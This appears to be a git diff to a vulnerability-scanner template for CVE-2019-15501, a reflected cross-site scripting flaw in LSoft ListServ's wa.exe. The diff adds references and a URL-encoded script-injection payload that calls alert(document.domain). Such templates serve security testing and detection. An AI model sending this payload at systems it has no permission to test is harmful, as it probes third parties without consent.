diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index b6d85a69fc..76a4f68286 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -4,21 +4,29 @@ info: name: LSoft ListServ - XSS author: Borna Nematzadeh severity: medium - refrense: https://www.exploit-db.com/exploits/47302 - tags: cve,xss + reference: | + - https://www.exploit-db.com/exploits/47302 + - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 + tags: cve,cve2019,xss requests: - method: GET path: - - '{{BaseURL}}/scripts/wa.exe?OK=' + - '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - "text/html" part: header + words: + - text/html + + - type: status + status: + - 200